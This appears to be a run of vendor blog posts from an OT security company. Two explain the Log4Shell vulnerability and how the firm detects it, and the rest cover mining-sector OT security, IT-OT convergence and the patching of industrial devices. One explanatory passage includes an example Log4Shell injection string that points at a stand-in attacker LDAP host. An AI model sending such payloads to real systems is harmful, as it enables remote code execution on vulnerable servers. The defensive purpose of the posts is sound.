Until two weeks ago, Log4j was just a popular Java logging framework, one of the numerous components that run in the background of many modern web applications. But since a zero-day vulnerability (CVE-2021-44228) was published, Log4j has made a huge impact on the security community as researchers found that it’s vulnerable to arbitrary code execution. 

The good news is that the Apache Software Foundation has already fixed and rolled out the patch for the vulnerability. On top of the patch, thanks to SCADAfence’s research and R&D team, our latest build supports the detection of Log4j exploit attempts.

Quick Recap of CVE-2021-44228 in Log4j

Log4J is an unauthenticated remote code execution (RCE, code injection) vulnerability in the popular Log4j logging framework for Java. By exploiting it, the attacker can easily execute any code from a remote source on the attacked target. NIST has given this vulnerability (CVE-2021-44228) a score of 10 out of 10, which reflects its criticality.

Over 3 billion devices run Java, and because there are only a handful of logging libraries, many of them are likely to run Log4j. Worse still, many internet-exposed target applications can be exploited by external users without authentication. 

Over the past two weeks, major OT vendors disclosed the security impact of this vulnerability on their software and equipment, and additional disclosures will continue as vendors work to identify the use of Log4j across their product lines. Originally, the Log4j vulnerability made it challenging to identify potentially impacted servers on a given network. For OT networks that have incorporated network segmentation, the risk from these protocols can be mitigated to an extent.

How To Ensure That Your Systems Are Safe

First, it’s important to understand that the root cause of this issue lies within the Log4j library. The Apache Software Foundation released an emergency patch for the vulnerability. You should upgrade your systems to Log4j 2.15.0 immediately or apply the appropriate mitigations.

Our OT security threat intelligence database learns about the different behavior to highlight activities attempting to leverage this vulnerability and to provide remediation guidance. Our customers are notified of log4j exploit attempts, and also on any anomaly detected by our anomalies engine. but our customers are already protected simply based on the efficacy of our anomaly detection.

The SCADAfence Platform, the Governance Portal, and the Multi-Site Portal do not use Log4J or the Apache server, and thus SCADAfence product installations are updated and secure from the Log4J vulnerability. Customers do not need to take action for any of our on-prem or hosted web solutions.

At SCADAfence, we felt network segmentation wasn’t enough to fight off the critical vulnerability. The latest build of the SCADAfence Platform detects and allows SCADAfence customers to leverage our OT security threat intelligence service to ensure they can patch and mitigate this exploit in any of their OT devices.

The SCADAfence Platform Detects & Alerts if an OT Asset is Vulnerable to the Log4Shell Vulnerability

We’ve updated our log4shells/log4j exploit detection inside the SCADAfence Platform as we have maneuvered ahead. We added CVE signatures to our database which detect and alert RCE (Remote Code Execution) exploits. 

The following CVEs were added to the SCADAfence database to correlate and alert of vulnerable OT assets: 

1. CVE-2021-44228   
2. CVE-2021-45046 
3. CVE-2021-4104
4. CVE-2020-9488
5. CVE-2019-17571
6. CVE-2017-5645

How Can You Deploy The Latest Version of SCADAfence

The latest version of the SCADAfence Platform which detects the CVE signatures relating to the vulnerability is available in build 6.6.1.167. To get the latest version, please contact your customer success representative.

If your organization is looking into securing its industrial networks, the experts at SCADAfence are seasoned veterans in this space and can show you how it’s done. 

To learn more about SCADAfence’s array of OT & IoT security products, and to see short product demos, click here: https://l.scadafence.com/demo

December 10, 2021, will always be remembered by the security community as the day when a highly critical zero‑day vulnerability was found in the very popular logging library for Java applications, log4j and identified as CVE-2021-44228. Not long after identified the name “Log4Shell” was coined for the exploit and every organization, no matter their size, including every security vendor, quickly rushed to mitigate the zero-day vulnerability within their applications. This patching marathon is still a work in process as we speak.  

Log4Shell is a critical vulnerability that requires urgent action. We can’t stress enough how important this Log4Shell vulnerability is. It’s a critical security vulnerability with a CVSS score of 10 that allows attackers to execute code remotely in any vulnerable environment. 

If you have not mitigated the Log4Shell vulnerability, we strongly recommend upgrading to the latest v2 version of Log4j which includes the recent vulnerability fix. You can find the mitigation process in Apache’s official Migration from Log4j v1 document. If you are unable to upgrade to the latest version, our research team recommends disabling JMSAppender or blocking any user input from reaching its configuration.

How the Log4Shell Vulnerability Works

The Log4Shell vulnerability targets the parts of Log4j that parse and log user-controlled data. Log4Shell allows attackers to exploit and compromise vulnerable applications. The vulnerability takes advantage of Log4j’s ability to use JNDI, the Java Naming and Directory Interface. By using JNDI lookups, an attacker can force the vulnerable application to connect to an attacker-controlled LDAP (Lightweight Directory Access Protocol) server and issue a malicious payload. Here is a visual diagram of the attack chain from the Swiss Government Computer Emergency Response Team.

To exploit a vulnerable target, attackers must trick the application code into writing a log entry that includes a string such as ${jndi:ldap://evil.xa/x}. Many applications logging is essential and a lot of different information is logged about every incoming request. While the vulnerability is affecting many attack vectors, until mitigation steps and the patch is complete no application or attack vector is safe from Log4Shell.

ICS/OT industry Response to Log4Shell

When the exploitation was first reported the ICS/OT industry didn’t think they were affected but now the ICS manufacturers are rushing to respond to Log4Shell.

Siemens confirmed that 17 of its products were affected by CVE-2021-44228 and that they have started to release patches and provide mitigation advice. Products confirmed to be affected include E-Car OC, EnergyIP, Geolus, Industrial Edge Management, Logo! Soft Comfort, Mendix, MindSphere, Operation Scheduler, Siguard DSA, Simatic WinCC, SiPass, Siveillance, Solid Edge, and Spectrum Power.

Additionally, Schneider Electric also released an advisory, but they announced they are still understanding which of their products are affected. Inductive Automation, which provides SCADA software and industrial automation solutions, announced that it conducted a full audit and determined that its products are not impacted.

While OT/ICS vendors are responding to Log4Shell and publishing advisories, this is not enough to ensure that OT environments and devices are secure against the Log4Shell vulnerability. Now that OT networks are becoming increasingly connected, the attack surface is widening, and increased risk is likely. But unlike in IT, OT environments have much more at stake. To ensure this vulnerability won’t cause more harm than needed, organizations should look into network segmentation in their OT environments. This will decrease the chance that their OT devices and networks will be exploited via the Log4Shell vulnerability. 

Too often, OT devices are outdated and don’t offer the latest version or upgrade which allows attackers to easily exploit an OT environment. In the case that OT vendors provide the latest patch or upgrade, organizations need to upgrade their OT technology. However, sometimes  OT teams won’t update their technology with the secure version due to their approach of “don’t fix what’s not broken”. This outdated and passive approach can result in the organization’s OT infrastructure becoming an easy target for attackers.  

SCADAfence’s OT Security is Here to Help

First of all, at SCADAfence we are here to assure you that all our products, The SCADAfence Platform for OT Security, the Governance Platform, and the Multi-Site Platform are updated and secure from the Log4Shell vulnerability. We remediated the Log4Shell vulnerability in our deployed application services’ code. Customers do not need to take action for any of our hosted web solutions.

The SCADAfence Platform Detects & Alerts if an OT Asset is Vulnerable to the Log4Shell Vulnerability

On top of ensuring that our products are secure, SCADAfence’s researchers analyzed the vulnerability and now the SCADAfence Platform detects and alerts if an OT asset is vulnerable with the Log4Shell zero-day vulnerability. SCADAfence customers can leverage our OT security threat intelligence service to ensure they can patch and mitigate this exploit in any of their OT devices.

On top of offering OT security threat intelligence, SCADAfence enables organizations to increase their visibility into their entire network as it’s difficult to protect what you can not see. Additional recommended practices are to adopt security network monitoring solutions that provide network segmentation and micro-segmentation as this will help organizations prevent similar exploitations moving forward. 

Still Patch, Patch, Patch 

Patching is still your best bet to combat this vulnerability. If patching isn’t possible, implementing mitigation techniques is the next best path to minimize the attack surface. SCADAfence’s research team is monitoring the evolution of this vulnerability and will provide additional information and support as needed. 

If your organization is looking into securing its industrial networks, the OT & IoT cyber security experts at SCADAfence are seasoned veterans in this space and can show you how it’s done. 

To learn more about SCADAfence’s array of OT & IoT security products, and to see short product demos, click here: https://l.scadafence.com/demo

The COVID-19 pandemic has been detrimental to the world economy while flattening many industries. The mining industry was fortunate to be one of the very few industries to deliver exceptional growth throughout this period. Yet this growth has marked the mining industry out as a lucrative target for cybercriminals.

Cybercrime has increased over the course of the pandemic as threat actors try to take advantage of the rapidly changing circum- stances, misinformation, and organizations’ shift to a hybrid workplace. The rewards for successful cyber-attacks are staggering. To put this in perspective, it is currently estimated that cyber-crime is worth more than the illegal drug trade globally, with billions of dollars paid out each year on ransomware. Cybercrime continues to accelerate and is expected to cost 10.5 trillion USD annually by 2025.

Cybercriminals are also becoming more innovative and creative as they target complex, business-critical Operational Technology (OT) environments, including Industrial Control Systems (ICS) and Supervisory Control And Data Acquisition (SCADA) systems.

Several high-profile attacks have demonstrated both the increasing sophistication of attacks and the devastating effects of a breach in these environments. In 2010 a malicious worm traveled for years to eventually find its SCADA target at an Iranian nuclear plant. More recently, in February 2021, a hacker attempted to poison the water supply of Oldsmar in Florida by using remote access to alter the levels of sodium hydroxide in the water. Though the attempt was thwarted, it illustrated the threat to industrial control systems1. Then in May, hackers successfully gained entry into the Colonial Pipeline Company network, which led to the shutdown of their 5,500-mile fuel pipeline, a shortage of petroleum in the USA and a ransom pay-out of $5.6 million3.

The rapid shift to remote work during the lockdown, and the consequential increase in cyber threats arising from the greater attack surface, have increased the demand for cybersecurity skills. Combined with the existing global shortage of cyber expertise, this demand means many organizations struggle to find and keep the people required to effectively manage security governance and operations across IT/OT environments. In response, we are now seeing increasing adoption of managed security services such as managed detection and response (MDR) solutions and vulnerability and threat identification tools designed specifically for OT systems.

Targeted mining attacks have the potential to affect four parts of operations: extraction, processing/refinement, stock management, and shipping. Each function presents a different set of risks that, if exploited, can reduce efficiency, inhibit operations, and cause financial turmoil. Given the extremely dangerous environments that mine sites present – heavy machinery, fumes, and explosives – the effect of a cyberattack on safety technologies such as wearables and gas detectors is possibly the most severe example.

Understanding the OT Environment 

Security analysts need to understand what is happening within OT systems with a unified system that monitors and assesses both OT and traditional IT environments. Complete coverage of an industrial mining network must include continuous monitoring of the components within the industrial network, such as programmable logic controllers or remote terminal units. Companies need to be continually monitoring governance and compliance aligned to industry good practice and ensuring coverage extends to IoT devices and machinery.

With such complex environments, many mining companies face an increasingly complex task to manage their cybersecurity. It is not uncommon to see companies procure half-a-dozen or more solutions. In fact, one study found 40% of organizations use 10 to 25 separate security tools, and 30% use 26 to 50 tools. This only adds to security teams’ burden. Furthermore, traditional security tools often don’t provide the required visibility into OT networks and devices that companies need to operate.

The key to managing this complexity and simplifying security is to bring network visibility, asset monitoring, vulnerability management, threat intelligence and threat detection into one solution. Security teams can focus on identifying, understanding, and remediating issues rather than managing data and tools. Tooling that is OT-specific and run by professionals who understand the nuances of OT environments is key.

Industry-leading OT security

At Rapid7, we know cyber security. We have two decades of experience in helping organizations advance their security postures and have assisted in increasing customers’ cyber security maturity. Our solutions are built to incorporate the change in modern environments, including the continued convergence of OT, and we offer clarity of risk, while helping secure your entire attack surface.

At Rapid7, we provide targeted threat detection through our External Threat Intelligence platform, allowing you to leverage tailored and actionable intelligence based on unique digital assets. This enables you to identify, block, and takedown attacks that directly target your industry and digital operations.

 For example, you can identify new malware kits and exploits that target production line equipment and/or OT devices or monitor hacker chatter to prioritize and lockdown vulnerabilities before they are exploited.

To expand the power of our solution in OT environments, we have partnered with the award-winning SCADAfence team to develop deep integrations between the two platforms to meet IT and OT security needs. Security teams now have a consolidated solution for IT, OT and IoT vulnerability management, threat intelligence, and incident detection and response.

SCADAfence is an industrial cybersecurity solution that provides visibility and monitoring for the mining industry’s OT & IoT networks. SCADAfence were recently recognized as Frost & Sullivan’s 2021 entrepreneurial company of the year, not to mention positioned as a Leader in the new Frost and Sullivan Radar for the Global Critical Infrastructure cyber security market. SCADAfence also won three coveted global infosec awards at RSA conference, including ICS/SCADA market leader.

SCADAfence’s solution automates asset discovery and inventory management, as well as threat detection and risk management. Remote access security capabilities enable security teams to track user activities and detect those that are outside the user profile or are malicious in nature.

By employing a wide range of algorithms, machine learning and AI, the platform detects anomalies and security events that can compromise availability and affect the safety and reliability of the OT network and its assets. A governance portal also measures compliance across all sites and identifies gaps or bottlenecks to help improve organizational security at scale.

SCADAfence provides 100% deep packet traffic inspection of all SCADA/ICS/IoT devices out of band, and offer a Governance and Compliance modules for ISO, NERC/CIP, EU and many other standard compliance models, providing a seamless reporting mechanism on the cyber security posture within OT environments. This ensures that reporting requirements align to your defined security frameworks.

A Consolidated Approach to Mining OT security

Rapid7 has integrated SCADAfence’s specialized OT monitoring with our industry-leading Insight platform to provide a comprehensive security solution without overwhelming your teams. The integration works bi-directionally and adds great security and manageability. Vulnerability data is collected from across the corporate IT and OT environments and provides visibility in a single interface for a comprehensive insight into IT/OT vulnerabilities.

Threats identified within the OT environment are communicated to teams via a central Security Information and Event Management (SIEM) solution (e.g. Rapid7’s InsightIDR). This, combined with the centralized vulnerability information, is what provides the single interface of all identified vulnerabilities and threats within the IT/OT environments.

The Rapid7 XDR solution (InsightIDR) ingests all your IT/OT threat data, as well as network traffic analysis (NTA), user behavior analytics (UEBA) and endpoint detection and response (EDR) data, to provide a complete view of your environment’s attack surface.

The XDR solution provides security teams with a single, centralized solution that can quickly identify malicious behavior across your entire environment.

In addition, with Rapid7 IntSights, our Threat Intelligence (TI) solution can also look for external threats from the clear, deep, and dark web, picking up industry targeted attacks, leaked company credentials, brand impersonation, executive impersonation and much, much more.

As a result, mining companies now have a single consolidated solution for IT/OT/IoT security, vulnerability management, threat intelligence, extended detection and response, and security orchestration and automation.

Opinion Disclaimier

The views and opinions expressed in this post are those of the author and do not represent the official policy or position of SCADAfence.

This article was orginally published in the Australian Mining Review and is authored by John Rice, Account Exectuve at Rapid7

The original post can be found here: https://australianminingreview.com.au/latest/#page=88

Thanksgiving – when families get together and express gratitude for everything they have over some food and hopefully some football. For most families and especially security teams, this is a time for looking back to evaluate the past year and to give thanks for how far we’ve come. 

When looking back at the past 12 months for the OT security community, it was a challenging year as the industry was bombarded with increasing amounts of successful ransomware attacks on industrial and critical infrastructure organizations. Instead of highlighting the attacks, we believe it’s better to focus on the different aspects of OT security that we are truly thankful for. 

Here at SCADAfence, we are grateful for all the efforts and innovation put in by our team and the collective OT security community. The sleepless nights and ongoing devotion to improving OT network visibility and security for industrial organizations is something everyone can be thankful for this thanksgiving. 

From the increasing awareness of IT-OT convergence to the US Government emphasizing the security risks that relate to OT environments, 2021 is a clear example that OT security is headed in the right direction and getting growing awareness by board members & C-level executives worldwide. 

As we look at last year and move forward, here are the 5 reasons why we are thankful for OT security. 

IT-OT Convergence

Just like on Thanksgiving, some family members might not see eye to eye at first but by the end of the night, everyone is happy and in agreement. This yearly experience is very relatable for security experts in IT and OT teams as they need to work together when it comes to the responsibility of OT security and converging networks.  

Up until recently, IT and OT teams rarely worked together as OT security teams were not in charge of advanced threats and IT security. With the advancement of operational technology and the adoption of industrial IoT devices, the need to converge IT and OT networks and systems is becoming more popular by the day with industrial organizations. 

With the increasing usage of IP-based communications with OT devices, there is a bigger challenge between IT & OT teams in understanding who is in charge of securing OT systems and this has created a cultural divide between teams. IT and OT teams’ technical barriers and lack of clear ownership are the key challenges why IT and OT teams are less open to working together. While the awareness of this challenge is increasing, we are seeing more organizations invest in technologies and governance platforms to ensure improved collaboration as they see that proper IT-OT convergence is a crucial aspect of their cyber security program.

Similar to families making up at the end of the Thanksgiving dinner, when IT & OT teams both come to the mutual table to wine and dine, it can result in improved visibility and transparency for an organization’s complete network security. At SCADAfence we have seen many of our customers adopt a seamless IT-OT convergence approach including one of the leading oil and gas organizations who are experiencing complete network visibility to all 71 of their global production sites.

OT Detection & Response

As industrial organizations become more interconnected, they potentially have more exposure to vulnerabilities. The high cost of industrial equipment and the damages to communities and economies that an attack could cause are key factors for organizations who are looking to protect their industrial networks. In addition, aging legacy equipment in factories, safety regulations that forbid any modifications being made to equipment and industry compliance regulations have created quite the challenge for OT teams.

Despite all of this, it is possible to secure industrial networks without disturbing regular operations and without risking non-compliance. By using OT security solutions that provide continuous threat detection and establishing the right security policies, OT security teams can put an effective OT strategy in place that will protect their organization’s processes, people and profit while significantly reducing security incidents and vulnerabilities.

Asset Inventory Management 

Effective cyber security in OT requires a deep foundation of asset information. Until recently OT teams didn’t have the resources or tools to maintain such an assets inventory. When organizations don’t deploy asset inventory management within an OT environment it creates a major visibility hole as they won’t know the security status of their environments. 

In some cases, industrial organizations will only create a simplified asset inventory to detect the data for security tasks. Organizations need to change their approach to asset inventory management and see it as the foundation of their OT security program.  

When detecting new vulnerabilities in OT networks and devices, organizations rely on their asset inventory to decide the severity of the vulnerability, how to patch the device and how it affects their environments. With an automated asset inventory, industrial organizations will increase the productivity and efficiency of their OT teams by quickly managing their assets data to detect and protect their environments all in one dashboard.  

Governance and Compliance 

Compliance regulations in OT are another aspect for security leaders to be thankful for as it is crucial for the security and production of industrial organizations. In recent years, there has been a growing demand for standards and guidelines to manage the risk exposure of OT infrastructures. IT and OT departments, who typically manage the cyber security standards across the organization, are now required to monitor the compliance of these standards across the various OT locations. On the other hand, the information provided today by the various IT tools is dispersed and is technical in nature. This makes the ability to translate them into risks and to prioritize actionable mitigations, very challenging and time-consuming. 

Organizations need to automate the governance processes with a solution that enables the IT and OT departments to centrally define and monitor the organizational adherence to organizational policies and to OT-related regulations. The solution should be configured and managed from a central location and aggregates compliance information from all sites in the organization. It also connects to other security systems, providing a cross-organizational, comprehensive compliance posture. 

OT Remote Access

Industrial organizations have undergone an evolution where most OT environments were isolated systems and now most OT systems are interconnected to the internet. This is occurring due to organizations deploying new technology that allows increased remote access management to OT systems. 

By providing remote access to OT systems it creates an advantage for industrial organizations but it also comes with more risks. By increasing the connectivity of OT systems and devices to the internet it can result in exploitation via cyber attacks. The constant increase of attacks on critical infrastructure and the convergence of IT and OT systems has quickly increased the adoption of remote access security in critical infrastructures and industrial organizations.

To fight off remote access security risks within OT environments, organizations need to deploy OT security solutions that come integrated with remote access features that are specifically designed for OT environments. By deploying an OT security platform that integrates remote access security that does not require any changes in network architecture, it will ensure that the OT systems are properly configured to detect and correlate remote user activity and detect if there is any malicious network activity.

Lastly, all of us at SCADAfence would like to thank our readers. It’s a privilege to share our passion for a subject with fellow security-minded folks. We wish everyone who’s celebrating a safe and happy Thanksgiving!

When organizations are seeking out the right cybersecurity controls for their OT environments and devices, the clear objective is to decrease and eliminate risks. Too often organizations only adopt the minimal level of security. While each organization defines its security risk levels, it is often based on their production environments, industrial devices and the critical risk factor of their facility production.

Many organizations will use different techniques to manage their risks, but one of the most common methods is patching. At the heart of every security strategy, patching is one of the key elements to securing any potential vulnerabilities within an organization. Despite patching being commonly used in risk management strategies, advancing patching for OT devices is still a work in progress.

Patch management in OT and Industrial Control Systems (ICS) comes with many security challenges. From lack of OT experts, proprietary hardware and software, compliance regulation reporting, minimal testing equipment and device and system maintenance, many industrial organizations struggle to clearly understand how they need to patch their vulnerable devices. This results in unmanaged patches.

Industrial Device Vulnerability Management Processes

When deciding what needs to be patched, security teams need to decide and evaluate the practicability of OT patching for their organization. With OT environments, applying patches is a balance that is based on the security benefits of what the patch provides versus the disruption of operational activities due to patching. These both are crucial factors to consider when patching OT environments.

With every standard OT security patching program, it starts with 4 steps to success. The first step is to detect and discover which assets you have within your OT environments. The next step is to assess the industrial devices and OT equipment for vulnerabilities. There can be different types of vulnerabilities but most vulnerabilities will fall under the categories of security risks or software and device misconfiguration.

The third step is to analyze and prioritize the vulnerabilities. Here is where organizations learn which devices are vulnerable and which are not and what priority should be assigned to patch the vulnerable devices. In some cases in this step, organizations will question should we even patch the vulnerability or why should we care about it? While it’s an organization’s job to decide what to patch and not to patch, we recommend patching all vulnerabilities to ensure the security of an organization will be secure. 

The fourth and final step is remediating the vulnerability. This is where security teams will patch the vulnerabilities within their industrial devices.  For example, patching a PLC, fixing device configurations and more. 

IT Patching Does Not Work in OT 

Today’s organizations need to run different security testing to clearly understand which vulnerabilities they have in their OT environments. In IT security, most organizations will adopt vulnerability scanning tools. With asset vulnerability scans, these are typically assessed based on port enumeration and authenticating to the devices to get comprehensive configuration/policy and registry information. While this might be useful for IT security it doesn’t work with OT security. 

For example, an automotive manufacturer in Germany had a couple of critical servers that were connected to their production line. Their servers crashed after scanning for vulnerabilities. They only scanned to see if they had one vulnerability in their environment. While they knew exactly what they were scanning for, it resulted in their OT environments being affected. The servers were a key part of their manufacturing process and the failure caused downtime and a loss of revenue of over a million dollars. 

When they investigated what the problem was, they identified that the scanner opened 13 sockets while the servers only supported up to four sockets in parallel. They flooded the servers with a capacity of three times higher than what was normal. The servers were unable to handle their operational processes and crashed. 

The lesson learned in this example is if you come with an IT security approach of scanning for vulnerabilities with OT, an organization might cause more damage than a cyber attack.

Don’t Forget about the Costs

Now that organizations know the four-step process of device patching management, the cost of patching is a crucial aspect they must be aware of. Once organizations have all the information (asset inventory, network mapping, disclosure sources and maps of vulnerabilities) and they are ready to patch the vulnerabilities they need to understand the price to patch. 

With each patching process, there is a different cost associated with it and it shouldn’t be taken lightly. Every industrial organization’s biggest nightmare is production downtime. With every patching process, the organization will experience some kind of downtime but when managed correctly, it will only be for a short period of time. However, when an organization doesn’t manage the industrial device management process correctly it can financially impact the organization not only in the production line but also in the headlines.  

At SCADAfence, we have helped many industrial organizations to patch their OT devices. One common theme we have seen is when we show the organization the different vulnerabilities, they go ahead and they only fix that vulnerability and don’t fix their entire vulnerable device. This is a huge problem because if an organization doesn’t fix the core issue of a vulnerability, it will be easy for attackers to find another vulnerability. Organizations need to patch the entire device to ensure no vulnerabilities are left behind. 

Industrial Device Patching Comes with Benefits  

Now that we explained the risks of the cost impact of improper patching methods, organizations should consider what are the benefits. While patching OT devices can be risky at times for devices and servers to crash which results in downtime, there is a real benefit to patching.  

One of the biggest benefits that organizations experience is having an asset inventory, this is a great place to start. Adopting an automatic asset inventory provides the most efficient and the most accurate method to visually manage an organization’s industrial devices and understand if there are vulnerabilities in those devices. By mapping vulnerabilities to assets, it will allow organizations to prioritize the patching of vulnerable devices and increase the visibility into the connection points of each device on the OT network. 

In addition, we recommend isolating vulnerable devices from the OT network. In some cases, some OT devices will have a vulnerability that does not have a patch available. This could result from the protocols of a specific industrial device having too lenient restrictions which would make the device more vulnerable. By isolating vulnerable devices it will help organizations from allowing attackers to move laterally within their OT environment.

Simplifying Industrial Device Management

Moving forward, organizations need to assume that there are always unpatched devices in their OT networks due to not being able to be patched or because they haven’t been patched yet. If organizations adopt a concrete industrial device patching management strategy it will allow their security teams to efficiently detect vulnerabilities and attacks early on before attackers exploit the devices.

To answer the question, “to patch or not to patch”, is not a simple yes or no answer. 

We recommend adopting an industrial device patching approach based on actual trial testing with different scenarios. By understanding real-time device data and vulnerability information it will allow organizations to prioritize their patching of industrial devices.

To learn more about industrial device patching, on November 10th at 11 am EST, Rapid7 and SCADAfence will host a joint webinar: The Comprehensive Guide to Industrial Device Patching. 

During the webinar, we will provide three excellent tools that will help you with the decision-making process if “to patch, workaround or do nothing.”